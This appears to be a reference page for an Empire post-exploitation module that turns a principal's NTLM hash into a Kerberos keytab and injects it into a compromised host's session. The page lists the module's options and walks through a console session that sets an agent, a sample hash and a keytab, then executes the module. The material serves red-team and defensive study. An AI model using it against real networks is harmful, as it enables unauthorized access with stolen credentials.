Kerberos inject - Empire Module


This page contains detailed information about how to use the python/management/multi/kerberos_inject Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Kerberos inject
Module: python/management/multi/kerberos_inject
Source code: empire/server/modules/python/management/multi/kerberos_inject.yaml
MITRE ATT&CK: T1055
Language: Python
Needs admin: No
OPSEC safe: No
Background: No

The kerberos_inject module generates a kerberos keytab and injects it into the current runspace.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the kerberos_inject module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the kerberos_inject module:

Agent
Agent to execute module on.

Hash
NTLM Hash for the principal.

Keytab
Keytab file to create.
Default value: user.keytab.

Principal
The service principal name. [email protected].

Kerberos_inject Example Usage


Here's an example of how to use the kerberos_inject module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/multi/bash) > usemodule python/management/multi/kerberos_inject

 Author       @424f424f                                                             
 Background   False                                                                 
 Comments     Thanks to @passingthehash for bringing this up.                       
 Description  Generates a kerberos keytab and injects it into the current runspace. 
 Language     python                                                                
 Name         python/management/multi/kerberos_inject                               
 NeedsAdmin   False                                                                 
 OpsecSafe    False                                                                 
 Techniques   http://attack.mitre.org/techniques/T1055                              


,Record Options-----------,----------,------------------------------,
| Name      | Value       | Required | Description                  |
|-----------|-------------|----------|------------------------------|
| Agent     |             | True     | Agent to execute module on.  |
|-----------|-------------|----------|------------------------------|
| Hash      |             | True     | NTLM Hash for the principal. |
|-----------|-------------|----------|------------------------------|
| Keytab    | user.keytab | True     | Keytab file to create.       |
|-----------|-------------|----------|------------------------------|
| Principal |             | True     | The service principal name.  |
|           |             |          | [email protected]              |
'-----------'-------------'----------'------------------------------'

(Empire: usemodule/python/management/multi/kerberos_inject) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/management/multi/kerberos_inject) > set Hash 5fbc3d5fec8206a30f4b6c473d68ae76
[*] Set Hash to 5fbc3d5fec8206a30f4b6c473d68ae76
(Empire: usemodule/python/management/multi/kerberos_inject) > set Keytab user.keytab
[*] Set Keytab to user.keytab
(Empire: usemodule/python/management/multi/kerberos_inject) > set Principal value
[*] Set Principal to value
(Empire: usemodule/python/management/multi/kerberos_inject) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.